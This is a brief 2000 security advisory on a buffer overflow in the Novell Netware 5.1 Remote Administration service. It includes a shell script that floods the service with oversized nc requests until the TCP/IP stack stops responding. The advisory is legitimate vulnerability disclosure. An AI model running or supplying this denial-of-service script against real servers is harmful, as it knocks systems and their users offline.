Netware 5.1 Remote Admin Overflow
Reported April 18, 2000 by
Michal Zalewski
VERSIONS EFFECTED
  • Novell Netware 5.1 Remote Administration Service

DESCRIPTION

The Remote Administration service contains a buffer overflow condition that could allow an attacker to launch a denial of service attack against the system, or possibly inject code into the operating system for execution.

Because of inproper connection clean up, it is possible to saturate such a system with connections to a point where the system will stop responding on the network.

DEMONSTRATION

This is a simple script, which left to run for some time, would probably kill Netware"s TCP/IP stack. Change $SERVER and $PORT before using this to test your servers for the vulnerability.

-- kill_nwtcp.c --
#!/bin/sh

SERVER=127.0.0.1
PORT=8008
WAIT=3

DUZOA=`perl -e "\{print "A"x4093\}"`
MAX=30

while :; do
  ILE=0
  while \[ $ILE -lt $MAX \]; do
  (
     (
       echo "GET /"
       echo $DUZOA
       echo
      ) | nc $SERVER $PORT &
      sleep $WAIT
      kill -9 $!
   ) &>/dev/null &
    ILE=$\[ILE+1\]
   done
sleep $WAIT
done

------------

VENDOR RESPONSE

Novell is aware of this issue, however no response was known at the time of this writing.

CREDITS
Discovered and reported by
Michal Zalewski